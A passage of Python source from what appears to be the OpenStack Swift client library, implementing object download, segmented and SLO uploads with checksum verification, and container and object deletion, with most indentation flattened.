raise ClientException('Large object is identical',
http_status=304)
# Large objects are different; start the real download
del get_args['query_string']
get_args['response_dict'].clear()
headers, body = conn.get_object(container, obj, **get_args)
headers_receipt = time()
obj_body = _SwiftReader(path, body, headers,
options.get('checksum', True))
no_file = options['no_download']
if out_file == "-" and not no_file:
res = {
'action': 'download_object',
'container': container,
'object': obj,
'path': path,
'pseudodir': pseudodir,
'contents': obj_body
}
return res
fp = None
try:
content_type = headers.get('content-type', '').split(';', 1)[0]
if content_type in KNOWN_DIR_MARKERS:
make_dir = not no_file and out_file != "-"
if make_dir and not isdir(path):
mkdirs(path)
else:
make_dir = not (no_file or out_file)
if make_dir:
dirpath = dirname(path)
if dirpath and not isdir(dirpath):
mkdirs(dirpath)
if not no_file:
if out_file:
fp = open(out_file, 'wb', DISK_BUFFER)
else:
if basename(path):
fp = open(path, 'wb', DISK_BUFFER)
else:
pseudodir = True
for chunk in obj_body:
if fp is not None:
fp.write(chunk)
finish_time = time()
finally:
bytes_read = obj_body.bytes_read()
if fp is not None:
fp.close()
if ('x-object-meta-mtime' in headers and not no_file and
not options['ignore_mtime']):
try:
mtime = float(headers['x-object-meta-mtime'])
except ValueError:
pass # no real harm; couldn't trust it anyway
else:
if options['out_file']:
utime(options['out_file'], (mtime, mtime))
else:
utime(path, (mtime, mtime))
res = {
'action': 'download_object',
'success': True,
'container': container,
'object': obj,
'path': path,
'pseudodir': pseudodir,
'start_time': start_time,
'finish_time': finish_time,
'headers_receipt': headers_receipt,
'auth_end_time': conn.auth_end_time,
'read_length': bytes_read,
'attempts': conn.attempts,
'response_dict': results_dict
}
return res
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res = {
'action': 'download_object',
'container': container,
'object': obj,
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time,
'response_dict': results_dict,
'path': path,
'pseudodir': pseudodir,
'attempts': conn.attempts
}
return res
def _submit_page_downloads(self, container, page_generator, options):
try:
list_page = next(page_generator)
except StopIteration:
return None
if list_page["success"]:
objects = [o["name"] for o in list_page["listing"]]
if options["shuffle"]:
shuffle(objects)
o_downs = [
self.thread_manager.object_dd_pool.submit(
self._download_object_job, container, obj, options
) for obj in objects
]
return o_downs
else:
raise list_page["error"]
def _download_container(self, container, options):
_page_generator = self.list(container=container, options=options)
try:
next_page_downs = self._submit_page_downloads(
container, _page_generator, options
)
except ClientException as err:
if err.http_status != 404:
raise
raise SwiftError(
'Container %r not found' % container,
container=container, exc=err
)
error = None
while next_page_downs:
page_downs = next_page_downs
next_page_downs = None
# Start downloading the next page of list results when
# we have completed 80% of the previous page
next_page_triggered = False
next_page_trigger_point = 0.8 * len(page_downs)
page_results_yielded = 0
for o_down in interruptable_as_completed(page_downs):
yield o_down.result()
# Do we need to start the next set of downloads yet?
if not next_page_triggered:
page_results_yielded += 1
if page_results_yielded >= next_page_trigger_point:
try:
next_page_downs = self._submit_page_downloads(
container, _page_generator, options
)
except ClientException as err:
# Allow the current page to finish downloading
logger.exception(err)
error = err
except Exception:
# Something unexpected went wrong - cancel
# remaining downloads
for _d in page_downs:
_d.cancel()
raise
finally:
# Stop counting and testing
next_page_triggered = True
if error:
raise error
# Upload related methods
#
def upload(self, container, objects, options=None):
"""
Upload a list of objects to a given container.
:param container: The container (or pseudo-folder path) to put the
uploads into.
:param objects: A list of file/directory names (strings) or
SwiftUploadObject instances containing a source for the
created object, an object name, and an options dict
(can be None) to override the options for that
individual upload operation::
[
'/path/to/file',
SwiftUploadObject('/path', object_name='obj1'),
...
]
The options dict is as described below.
The SwiftUploadObject source may be one of:
* A file-like object (with a read method)
* A string containing the path to a local
file or directory
* None, to indicate that we want an empty object
:param options: A dictionary containing options to override the global
options specified during the service object creation.
These options are applied to all upload operations
performed by this call, unless overridden on a per
object basis. Possible options are given below::
{
'meta': [],
'header': [],
'segment_size': None,
'use_slo': False,
'segment_container': None,
'leave_segments': False,
'changed': None,
'skip_identical': False,
'fail_fast': False,
'dir_marker': False # Only for None sources
}
:returns: A generator for returning the results of the uploads.
:raises SwiftError:
:raises ClientException:
"""
if options is not None:
options = dict(self._options, **options)
else:
options = self._options
try:
segment_size = int(0 if options['segment_size'] is None else
options['segment_size'])
except ValueError:
raise SwiftError('Segment size should be an integer value')
        # In case we have a pseudo-folder path for the <container> arg, derive
        # the container name from the top path and prepend the rest to
        # the object name (same as passing --object-name).
container, _sep, pseudo_folder = container.partition('/')
# Try to create the container, just in case it doesn't exist. If this
# fails, it might just be because the user doesn't have container PUT
# permissions, so we'll ignore any error. If there's really a problem,
# it'll surface on the first object PUT.
policy_header = {}
_header = split_headers(options["header"])
if POLICY in _header:
policy_header[POLICY] = \
_header[POLICY]
create_containers = [
self.thread_manager.container_pool.submit(
self._create_container_job, container, headers=policy_header)
]
# wait for first container job to complete before possibly attempting
# segment container job because segment container job may attempt
# to HEAD the first container
for r in interruptable_as_completed(create_containers):
res = r.result()
yield res
if segment_size:
seg_container = container + '_segments'
if options['segment_container']:
seg_container = options['segment_container']
if seg_container != container:
if not policy_header:
# Since no storage policy was specified on the command
# line, rather than just letting swift pick the default
# storage policy, we'll try to create the segments
# container with the same policy as the upload container
create_containers = [
self.thread_manager.container_pool.submit(
self._create_container_job, seg_container,
policy_source=container
)
]
else:
create_containers = [
self.thread_manager.container_pool.submit(
self._create_container_job, seg_container,
headers=policy_header
)
]
for r in interruptable_as_completed(create_containers):
res = r.result()
yield res
# We maintain a results queue here and a separate thread to monitor
# the futures because we want to get results back from potential
# segment uploads too
rq = Queue()
file_jobs = {}
upload_objects = self._make_upload_objects(objects, pseudo_folder)
for upload_object in upload_objects:
s = upload_object.source
o = upload_object.object_name
o_opts = upload_object.options
details = {'action': 'upload', 'container': container}
if o_opts is not None:
object_options = deepcopy(options)
object_options.update(o_opts)
else:
object_options = options
if hasattr(s, 'read'):
# We've got a file like object to upload to o
file_future = self.thread_manager.object_uu_pool.submit(
self._upload_object_job, container, s, o, object_options,
results_queue=rq
)
details['file'] = s
details['object'] = o
file_jobs[file_future] = details
elif s is not None:
# We've got a path to upload to o
details['path'] = s
details['object'] = o
if isdir(s):
dir_future = self.thread_manager.object_uu_pool.submit(
self._create_dir_marker_job, container, o,
object_options, path=s
)
file_jobs[dir_future] = details
else:
try:
stat(s)
file_future = \
self.thread_manager.object_uu_pool.submit(
self._upload_object_job, container, s, o,
object_options, results_queue=rq
)
file_jobs[file_future] = details
except OSError as err:
# Avoid tying up threads with jobs that will fail
traceback, err_time = report_traceback()
logger.exception(err)
res = {
'action': 'upload_object',
'container': container,
'object': o,
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time,
'path': s
}
rq.put(res)
else:
# Create an empty object (as a dir marker if is_dir)
details['file'] = None
details['object'] = o
if object_options['dir_marker']:
dir_future = self.thread_manager.object_uu_pool.submit(
self._create_dir_marker_job, container, o,
object_options
)
file_jobs[dir_future] = details
else:
file_future = self.thread_manager.object_uu_pool.submit(
self._upload_object_job, container, StringIO(),
o, object_options
)
file_jobs[file_future] = details
# Start a thread to watch for upload results
Thread(
target=self._watch_futures, args=(file_jobs, rq)
).start()
# yield results as they become available, including those from
# segment uploads.
res = get_from_queue(rq)
cancelled = False
while res is not None:
yield res
if not res['success']:
if not cancelled and options['fail_fast']:
cancelled = True
for f in file_jobs:
f.cancel()
res = get_from_queue(rq)
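    # Illustrative sketch of a segmented upload (paths, names and the 10 MiB
    # segment size are hypothetical):
    #
    #     objs = ['photo1.jpg',
    #             SwiftUploadObject('photo2.jpg', object_name='2.jpg')]
    #     with SwiftService(options={'segment_size': 10 * 1024 * 1024}) as swift:
    #         for res in swift.upload('photos', objs):
    #             if not res['success']:
    #                 print(res['error'])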
@staticmethod
def _make_upload_objects(objects, pseudo_folder=''):
upload_objects = []
for o in objects:
if isinstance(o, string_types):
obj = SwiftUploadObject(o, urljoin(pseudo_folder,
o.lstrip('/')))
upload_objects.append(obj)
elif isinstance(o, SwiftUploadObject):
o.object_name = urljoin(pseudo_folder, o.object_name)
upload_objects.append(o)
else:
raise SwiftError(
"The upload operation takes only strings or "
"SwiftUploadObjects as input",
obj=o)
return upload_objects
@staticmethod
def _create_container_job(
conn, container, headers=None, policy_source=None):
"""
Create a container using the given connection
:param conn: The swift connection used for requests.
:param container: The container name to create.
:param headers: An optional dict of headers for the
put_container request.
:param policy_source: An optional name of a container whose policy we
should duplicate.
:return: A dict containing the results of the operation.
"""
res = {
'action': 'create_container',
'container': container,
'headers': headers
}
create_response = {}
try:
if policy_source is not None:
_meta = conn.head_container(policy_source)
if 'x-storage-policy' in _meta:
policy_header = {
POLICY: _meta.get('x-storage-policy')
}
if headers is None:
headers = policy_header
else:
headers.update(policy_header)
conn.put_container(
container, headers, response_dict=create_response
)
res.update({
'success': True,
'response_dict': create_response
})
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time,
'response_dict': create_response
})
return res
@staticmethod
def _create_dir_marker_job(conn, container, obj, options, path=None):
res = {
'action': 'create_dir_marker',
'container': container,
'object': obj,
'path': path
}
results_dict = {}
if obj.startswith('./') or obj.startswith('.\\'):
obj = obj[2:]
if obj.startswith('/'):
obj = obj[1:]
if path is not None:
put_headers = {'x-object-meta-mtime': "%f" % getmtime(path)}
else:
put_headers = {'x-object-meta-mtime': "%f" % round(time())}
res['headers'] = put_headers
if options['changed']:
try:
headers = conn.head_object(container, obj)
ct = headers.get('content-type', '').split(';', 1)[0]
cl = int(headers.get('content-length'))
et = headers.get('etag')
mt = headers.get('x-object-meta-mtime')
if (ct in KNOWN_DIR_MARKERS and
cl == 0 and
et == EMPTY_ETAG and
mt == put_headers['x-object-meta-mtime']):
res['success'] = True
return res
except ClientException as err:
if err.http_status != 404:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
})
return res
try:
conn.put_object(container, obj, '', content_length=0,
content_type=KNOWN_DIR_MARKERS[0],
headers=put_headers,
response_dict=results_dict)
res.update({
'success': True,
'response_dict': results_dict})
return res
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time,
'response_dict': results_dict})
return res
@staticmethod
def _upload_segment_job(conn, path, container, segment_name, segment_start,
segment_size, segment_index, obj_name, options,
results_queue=None):
results_dict = {}
if options['segment_container']:
segment_container = options['segment_container']
else:
segment_container = container + '_segments'
res = {
'action': 'upload_segment',
'for_container': container,
'for_object': obj_name,
'segment_index': segment_index,
'segment_size': segment_size,
'segment_location': '/%s/%s' % (segment_container,
segment_name),
'log_line': '%s segment %s' % (obj_name, segment_index),
}
fp = None
try:
fp = open(path, 'rb', DISK_BUFFER)
fp.seek(segment_start)
contents = LengthWrapper(fp, segment_size, md5=options['checksum'])
etag = conn.put_object(
segment_container,
segment_name,
contents,
content_length=segment_size,
content_type='application/swiftclient-segment',
response_dict=results_dict)
if options['checksum'] and etag and etag != contents.get_md5sum():
raise SwiftError('Segment {0}: upload verification failed: '
'md5 mismatch, local {1} != remote {2} '
'(remote segment has not been removed)'
.format(segment_index,
contents.get_md5sum(),
etag))
res.update({
'success': True,
'response_dict': results_dict,
'segment_etag': etag,
'attempts': conn.attempts
})
if results_queue is not None:
results_queue.put(res)
return res
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time,
'response_dict': results_dict,
'attempts': conn.attempts
})
if results_queue is not None:
results_queue.put(res)
return res
finally:
if fp is not None:
fp.close()
@staticmethod
def _put_object(conn, container, name, content, headers=None, md5=None):
"""
Upload object into a given container and verify the resulting ETag, if
the md5 optional parameter is passed.
:param conn: The Swift connection to use for uploads.
:param container: The container to put the object into.
:param name: The name of the object.
:param content: Object content.
:param headers: Headers (optional) to associate with the object.
:param md5: MD5 sum of the content. If passed in, will be used to
verify the returned ETag.
:returns: A dictionary as the response from calling put_object.
The keys are:
- status
- reason
- headers
On error, the dictionary contains the following keys:
- success (with value False)
- error - the encountered exception (object)
- error_timestamp
- response_dict - results from the put_object call, as
documented above
- attempts - number of attempts made
"""
if headers is None:
headers = {}
else:
headers = dict(headers)
if md5 is not None:
headers['etag'] = md5
results = {}
try:
etag = conn.put_object(
container, name, content, content_length=len(content),
headers=headers, response_dict=results)
if md5 is not None and etag != md5:
raise SwiftError('Upload verification failed for {0}: md5 '
'mismatch {1} != {2}'.format(name, md5, etag))
results['success'] = True
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
return {
'success': False,
'error': err,
'error_timestamp': err_time,
'response_dict': results,
'attempts': conn.attempts,
'traceback': traceback
}
return results
@staticmethod
def _upload_stream_segment(conn, container, object_name,
segment_container, segment_name,
segment_size, segment_index,
headers, fd):
"""
Upload a segment from a stream, buffering it in memory first. The
resulting object is placed either as a segment in the segment
container, or if it is smaller than a single segment, as the given
object name.
:param conn: Swift Connection to use.
:param container: Container in which the object would be placed.
:param object_name: Name of the final object (used in case the stream
is smaller than the segment_size)
:param segment_container: Container to hold the object segments.
:param segment_name: The name of the segment.
:param segment_size: Minimum segment size.
:param segment_index: The segment index.
:param headers: Headers to attach to the segment/object.
:param fd: File-like handle for the content. Must implement read().
:returns: Dictionary, containing the following keys:
- complete -- whether the stream is exhausted
- segment_size - the actual size of the segment (may be
smaller than the passed in segment_size)
- segment_location - path to the segment
- segment_index - index of the segment
- segment_etag - the ETag for the segment
"""
buf = []
dgst = md5()
bytes_read = 0
while bytes_read < segment_size:
data = fd.read(segment_size - bytes_read)
if not data:
break
bytes_read += len(data)
dgst.update(data)
buf.append(data)
buf = b''.join(buf)
segment_hash = dgst.hexdigest()
if not buf and segment_index > 0:
# Happens if the segment size aligns with the object size
return {'complete': True,
'segment_size': 0,
'segment_index': None,
'segment_etag': None,
'segment_location': None,
'success': True}
if segment_index == 0 and len(buf) < segment_size:
ret = SwiftService._put_object(
conn, container, object_name, buf, headers, segment_hash)
ret['segment_location'] = '/%s/%s' % (container, object_name)
else:
ret = SwiftService._put_object(
conn, segment_container, segment_name, buf, headers,
segment_hash)
ret['segment_location'] = '/%s/%s' % (
segment_container, segment_name)
ret.update(
dict(complete=len(buf) < segment_size,
segment_size=len(buf),
segment_index=segment_index,
segment_etag=segment_hash,
for_object=object_name))
return ret
def _get_chunk_data(self, conn, container, obj, headers, manifest=None):
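# Returns a list of {'hash': <md5>, 'bytes': <size>} dicts describing the
# object: the segments of a DLO, the (recursively expanded) segments of an
# SLO, or a single entry built from a plain object's ETag/content-length.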
chunks = []
if 'x-object-manifest' in headers:
scontainer, sprefix = headers['x-object-manifest'].split('/', 1)
for part in self.list(scontainer, {'prefix': sprefix}):
if part["success"]:
chunks.extend(part["listing"])
else:
raise part["error"]
elif config_true_value(headers.get('x-static-large-object')):
if manifest is None:
headers, manifest = conn.get_object(
container, obj, query_string='multipart-manifest=get')
manifest = parse_api_response(headers, manifest)
for chunk in manifest:
if chunk.get('sub_slo'):
scont, sobj = chunk['name'].lstrip('/').split('/', 1)
chunks.extend(self._get_chunk_data(
conn, scont, sobj, {'x-static-large-object': True}))
else:
chunks.append(chunk)
else:
chunks.append({'hash': headers.get('etag').strip('"'),
'bytes': int(headers.get('content-length'))})
return chunks
def _is_identical(self, chunk_data, path):
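# Compares the local file at `path` against the chunk list produced by
# _get_chunk_data(): each chunk's byte range is re-read from disk and
# md5-checked, and the file must end exactly where the last chunk ends.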
if path is None:
return False
try:
fp = open(path, 'rb', DISK_BUFFER)
except IOError:
return False
with fp:
for chunk in chunk_data:
to_read = chunk['bytes']
md5sum = md5()
while to_read:
data = fp.read(min(DISK_BUFFER, to_read))
if not data:
return False
md5sum.update(data)
to_read -= len(data)
if md5sum.hexdigest() != chunk['hash']:
return False
# Each chunk is verified; check that we're at the end of the file
return not fp.read(1)
@staticmethod
def _upload_slo_manifest(conn, segment_results, container, obj, headers):
"""
Upload an SLO manifest, given the results of uploading each segment, to
the specified container.
:param segment_results: List of response_dict structures, as populated
by _upload_segment_job. Specifically, each
entry must contain the following keys:
- segment_location
- segment_etag
- segment_size
- segment_index
:param container: The container to put the manifest into.
:param obj: The name of the manifest object to use.
:param headers: Optional set of headers to attach to the manifest.
"""
if headers is None:
headers = {}
segment_results.sort(key=lambda di: di['segment_index'])
for seg in segment_results:
seg_loc = seg['segment_location'].lstrip('/')
if isinstance(seg_loc, text_type):
seg_loc = seg_loc.encode('utf-8')
manifest_data = json.dumps([
{
'path': d['segment_location'],
'etag': d['segment_etag'],
'size_bytes': d['segment_size']
} for d in segment_results
])
response = {}
conn.put_object(
container, obj, manifest_data,
headers=headers,
query_string='multipart-manifest=put',
response_dict=response)
return response
def _upload_object_job(self, conn, container, source, obj, options,
results_queue=None):
if obj.startswith('./') or obj.startswith('.\\'):
obj = obj[2:]
if obj.startswith('/'):
obj = obj[1:]
res = {
'action': 'upload_object',
'container': container,
'object': obj
}
if hasattr(source, 'read'):
stream = source
path = None
else:
path = source
res['path'] = path
try:
if path is not None:
put_headers = {'x-object-meta-mtime': "%f" % getmtime(path)}
else:
put_headers = {'x-object-meta-mtime': "%f" % round(time())}
res['headers'] = put_headers
# We need to HEAD all objects now in case we're overwriting a
# manifest object and need to delete the old segments
# ourselves.
old_manifest = None
old_slo_manifest_paths = []
new_slo_manifest_paths = set()
segment_size = int(0 if options['segment_size'] is None
else options['segment_size'])
if (options['changed'] or options['skip_identical'] or
not options['leave_segments']):
try:
headers = conn.head_object(container, obj)
is_slo = config_true_value(
headers.get('x-static-large-object'))
if options['skip_identical'] or (
is_slo and not options['leave_segments']):
chunk_data = self._get_chunk_data(
conn, container, obj, headers)
if options['skip_identical'] and self._is_identical(
chunk_data, path):
res.update({
'success': True,
'status': 'skipped-identical'
})
return res
cl = int(headers.get('content-length'))
mt = headers.get('x-object-meta-mtime')
if (path is not None and options['changed'] and
cl == getsize(path) and
mt == put_headers['x-object-meta-mtime']):
res.update({
'success': True,
'status': 'skipped-changed'
})
return res
if not options['leave_segments'] and not headers.get(
'content-location'):
old_manifest = headers.get('x-object-manifest')
if is_slo:
old_slo_manifest_paths.extend(
normalize_manifest_path(old_seg['name'])
for old_seg in chunk_data)
except ClientException as err:
if err.http_status != 404:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
})
return res
# Merge the command line header options into put_headers
put_headers.update(split_headers(
options['meta'], 'X-Object-Meta-'))
put_headers.update(split_headers(options['header'], ''))
# Don't do a segment job if the object is not big enough, and never do
# a segment job if we're reading from a stream - we may fail if we
# go over the single object limit, but this gives us a nice way
# to create objects from memory.
if (path is not None and segment_size and
(getsize(path) > segment_size)):
res['large_object'] = True
seg_container = container + '_segments'
if options['segment_container']:
seg_container = options['segment_container']
full_size = getsize(path)
segment_futures = []
segment_pool = self.thread_manager.segment_pool
segment = 0
segment_start = 0
while segment_start < full_size:
if segment_start + segment_size > full_size:
segment_size = full_size - segment_start
if options['use_slo']:
segment_name = '%s/slo/%s/%s/%s/%08d' % (
obj, put_headers['x-object-meta-mtime'],
full_size, options['segment_size'], segment
)
else:
segment_name = '%s/%s/%s/%s/%08d' % (
obj, put_headers['x-object-meta-mtime'],
full_size, options['segment_size'], segment
)
seg = segment_pool.submit(
self._upload_segment_job, path, container,
segment_name, segment_start, segment_size, segment,
obj, options, results_queue=results_queue
)
segment_futures.append(seg)
segment += 1
segment_start += segment_size
segment_results = []
errors = False
exceptions = []
for f in interruptable_as_completed(segment_futures):
try:
r = f.result()
if not r['success']:
errors = True
segment_results.append(r)
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
errors = True
exceptions.append((err, traceback, err_time))
if errors:
err = ClientException(
'Aborting manifest creation '
'because not all segments could be uploaded. %s/%s'
% (container, obj))
res.update({
'success': False,
'error': err,
'exceptions': exceptions,
'segment_results': segment_results
})
return res
res['segment_results'] = segment_results
if options['use_slo']:
response = self._upload_slo_manifest(
conn, segment_results, container, obj, put_headers)
res['manifest_response_dict'] = response
new_slo_manifest_paths.update(
normalize_manifest_path(new_seg['segment_location'])
for new_seg in segment_results)
else:
new_object_manifest = '%s/%s/%s/%s/%s/' % (
quote(seg_container.encode('utf8')),
quote(obj.encode('utf8')),
put_headers['x-object-meta-mtime'], full_size,
options['segment_size'])
if old_manifest and old_manifest.rstrip('/') == \
new_object_manifest.rstrip('/'):
old_manifest = None
put_headers['x-object-manifest'] = new_object_manifest
mr = {}
conn.put_object(
container, obj, '', content_length=0,
headers=put_headers,
response_dict=mr
)
res['manifest_response_dict'] = mr
elif options['use_slo'] and segment_size and not path:
segment = 0
results = []
while True:
segment_name = '%s/slo/%s/%s/%08d' % (
obj, put_headers['x-object-meta-mtime'],
segment_size, segment
)
seg_container = container + '_segments'
if options['segment_container']:
seg_container = options['segment_container']
ret = self._upload_stream_segment(
conn, container, obj,
seg_container,
segment_name,
segment_size,
segment,
put_headers,
stream
)
if not ret['success']:
return ret
if (ret['complete'] and segment == 0) or\
ret['segment_size'] > 0:
results.append(ret)
if results_queue is not None:
# Don't insert the 0-sized segments or objects
# themselves
if ret['segment_location'] != '/%s/%s' % (
container, obj) and ret['segment_size'] > 0:
results_queue.put(ret)
if ret['complete']:
break
segment += 1
if results[0]['segment_location'] != '/%s/%s' % (
container, obj):
response = self._upload_slo_manifest(
conn, results, container, obj, put_headers)
res['manifest_response_dict'] = response
new_slo_manifest_paths.update(
normalize_manifest_path(new_seg['segment_location'])
for new_seg in results)
res['large_object'] = True
else:
res['response_dict'] = ret
res['large_object'] = False
else:
res['large_object'] = False
obr = {}
fp = None
try:
if path is not None:
content_length = getsize(path)
fp = open(path, 'rb', DISK_BUFFER)
contents = LengthWrapper(fp,
content_length,
md5=options['checksum'])
else:
content_length = None
contents = ReadableToIterable(stream,
md5=options['checksum'])
etag = conn.put_object(
container, obj, contents,
content_length=content_length, headers=put_headers,
response_dict=obr
)
res['response_dict'] = obr
if (options['checksum'] and
etag and etag != contents.get_md5sum()):
raise SwiftError(
'Object upload verification failed: '
'md5 mismatch, local {0} != remote {1} '
'(remote object has not been removed)'
.format(contents.get_md5sum(), etag))
finally:
if fp is not None:
fp.close()
if old_manifest or old_slo_manifest_paths:
drs = []
delobjsmap = defaultdict(list)
if old_manifest:
scontainer, sprefix = old_manifest.split('/', 1)
sprefix = sprefix.rstrip('/') + '/'
for part in self.list(scontainer, {'prefix': sprefix}):
if not part["success"]:
raise part["error"]
delobjsmap[scontainer].extend(
seg['name'] for seg in part['listing'])
if old_slo_manifest_paths:
for seg_to_delete in old_slo_manifest_paths:
if seg_to_delete in new_slo_manifest_paths:
continue
scont, sobj = \
seg_to_delete.split('/', 1)
delobjsmap[scont].append(sobj)
del_segs = []
for dscont, dsobjs in delobjsmap.items():
for dsobj in dsobjs:
del_seg = self.thread_manager.segment_pool.submit(
self._delete_segment, dscont, dsobj,
results_queue=results_queue
)
del_segs.append(del_seg)
for del_seg in interruptable_as_completed(del_segs):
drs.append(del_seg.result())
res['segment_delete_results'] = drs
# return dict for printing
res.update({
'success': True,
'status': 'uploaded',
'attempts': conn.attempts})
return res
except OSError as err:
traceback, err_time = report_traceback()
logger.exception(err)
if err.errno == ENOENT:
error = SwiftError('Local file %r not found' % path, exc=err)
else:
error = err
res.update({
'success': False,
'error': error,
'traceback': traceback,
'error_timestamp': err_time
})
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
})
return res
# Delete related methods
#
def delete(self, container=None, objects=None, options=None):
"""
Delete operations on an account, an optional container, and an optional
list of objects.
:param container: The container to delete or delete from.
:param objects: A list of object names (strings) or SwiftDeleteObject
instances containing an object name, and an
options dict (can be None) to override the options for
that individual delete operation::
[
'object_name',
SwiftDeleteObject('object_name',
options={...}),
...
]
The options dict is described below.
:param options: A dictionary containing options to override the global
options specified during the service object creation::
{
'yes_all': False,
'leave_segments': False,
'version_id': None,
'prefix': None,
'versions': False,
'header': [],
}
:returns: A generator for returning the results of the delete
operations. Each result yielded from the generator is either
a 'delete_container', 'delete_object', 'delete_segment', or
'bulk_delete' dictionary containing the results of an
individual delete operation.
:raises ClientException:
:raises SwiftError:
"""
if options is not None:
options = dict(self._options, **options)
else:
options = self._options
if container is not None:
if objects is not None:
delete_objects = self._make_delete_objects(objects)
if options['prefix']:
delete_objects = [
obj for obj in delete_objects
if obj.object_name.startswith(options['prefix'])]
rq = Queue()
obj_dels = {}
bulk_page_size = self._bulk_delete_page_size(delete_objects)
if bulk_page_size > 1:
page_at_a_time = n_at_a_time(delete_objects,
bulk_page_size)
for page_slice in page_at_a_time:
for obj_slice in n_groups(
page_slice,
self._options['object_dd_threads']):
object_names = [
obj.object_name for obj in obj_slice]
self._bulk_delete(container, object_names, options,
obj_dels)
else:
self._per_item_delete(container, delete_objects, options,
obj_dels, rq)
# Start a thread to watch for delete results
Thread(
target=self._watch_futures, args=(obj_dels, rq)
).start()
# yield results as they become available, raising the first
# encountered exception
res = get_from_queue(rq)
while res is not None:
yield res
# Cancel the remaining jobs if necessary
if options['fail_fast'] and not res['success']:
for d in obj_dels.keys():
d.cancel()
res = get_from_queue(rq)
else:
for res in self._delete_container(container, options):
yield res
else:
if objects:
raise SwiftError('Objects specified without container')
if options['prefix']:
raise SwiftError('Prefix specified without container')
if options['yes_all']:
cancelled = False
containers = []
for part in self.list():
if part["success"]:
containers.extend(c['name'] for c in part['listing'])
else:
raise part["error"]
for con in containers:
if cancelled:
break
else:
for res in self._delete_container(
con, options=options):
yield res
# Cancel the remaining container deletes, but yield
# any pending results
if (not cancelled and options['fail_fast'] and
not res['success']):
cancelled = True
def _bulk_delete_page_size(self, objects):
'''
Given the iterable 'objects', return how many items should be
deleted at a time.
:param objects: An iterable that supports 'len()'
:returns: The bulk delete page size (i.e. the max number of
objects that can be bulk deleted at once, as reported by
the cluster). If bulk delete is disabled, return 1
'''
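# For reference, the capabilities entry consulted below typically looks like
# (values illustrative):
#
#     {'bulk_delete': {'max_deletes_per_request': 10000, ...}}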
if len(objects) <= 2 * self._options['object_dd_threads']:
# Not many objects; may as well delete one-by-one
return 1
if any(obj.options for obj in objects
if isinstance(obj, SwiftDeleteObject)):
# per-object option overrides can't be honoured by bulk deletes
return 1
try:
cap_result = self.capabilities()
if not cap_result['success']:
# This shouldn't actually happen, but just in case we start
# being more nuanced about our capabilities result...
return 1
except ClientException:
# Old swift, presumably; assume no bulk middleware
return 1
swift_info = cap_result['capabilities']
if 'bulk_delete' in swift_info:
return swift_info['bulk_delete'].get(
'max_deletes_per_request', 10000)
else:
return 1
def _per_item_delete(self, container, objects, options, rdict, rq):
for delete_obj in objects:
obj = delete_obj.object_name
obj_options = dict(options, **delete_obj.options or {})
obj_del = self.thread_manager.object_dd_pool.submit(
self._delete_object, container, obj, obj_options,
results_queue=rq
)
obj_details = {'container': container, 'object': obj}
rdict[obj_del] = obj_details
@staticmethod
def _delete_segment(conn, container, obj, results_queue=None):
results_dict = {}
try:
res = {'success': True}
conn.delete_object(container, obj, response_dict=results_dict)
except Exception as err:
if not isinstance(err, ClientException) or err.http_status != 404:
traceback, err_time = report_traceback()
logger.exception(err)
res = {
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
}
res.update({
'action': 'delete_segment',
'container': container,
'object': obj,
'attempts': conn.attempts,
'response_dict': results_dict
})
if results_queue is not None:
results_queue.put(res)
return res
@staticmethod
def _make_delete_objects(objects):
delete_objects = []
for o in objects:
if isinstance(o, string_types):
obj = SwiftDeleteObject(o)
delete_objects.append(obj)
elif isinstance(o, SwiftDeleteObject):
delete_objects.append(o)
else:
raise SwiftError(
"The delete operation takes only strings or "
"SwiftDeleteObjects as input",
obj=o)
return delete_objects
def _delete_object(self, conn, container, obj, options,
results_queue=None):
_headers = {}
_headers = split_headers(options.get('header', []))
res = {
'action': 'delete_object',
'container': container,
'object': obj
}
try:
old_manifest = None
query_params = {}
if not options['leave_segments']:
try:
headers = conn.head_object(container, obj,
headers=_headers,
query_string='symlink=get')
old_manifest = headers.get('x-object-manifest')
if config_true_value(headers.get('x-static-large-object')):
query_params['multipart-manifest'] = 'delete'
except ClientException as err:
if err.http_status != 404:
raise
if options.get('version_id') is not None:
query_params['version-id'] = options['version_id']
query_string = '&'.join('%s=%s' % (k, v) for (k, v)
in sorted(query_params.items()))
results_dict = {}
conn.delete_object(container, obj,
headers=_headers,
query_string=query_string,
response_dict=results_dict)
if old_manifest:
dlo_segments_deleted = True
segment_pool = self.thread_manager.segment_pool
s_container, s_prefix = old_manifest.split('/', 1)
s_prefix = s_prefix.rstrip('/') + '/'
del_segs = []
for part in self.list(
container=s_container, options={'prefix': s_prefix}):
if part["success"]:
seg_list = [o["name"] for o in part["listing"]]
else:
raise part["error"]
for seg in seg_list:
del_seg = segment_pool.submit(
self._delete_segment, s_container,
seg, results_queue=results_queue
)
del_segs.append(del_seg)
for del_seg in interruptable_as_completed(del_segs):
del_res = del_seg.result()
if not del_res["success"]:
dlo_segments_deleted = False
res['dlo_segments_deleted'] = dlo_segments_deleted
res.update({
'success': True,
'response_dict': results_dict,
'attempts': conn.attempts,
})
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
})
return res
return res
@staticmethod
def _delete_empty_container(conn, container, options):
results_dict = {}
_headers = {}
_headers = split_headers(options.get('header', []))
try:
conn.delete_container(container, headers=_headers,
response_dict=results_dict)
res = {'success': True}
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res = {
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
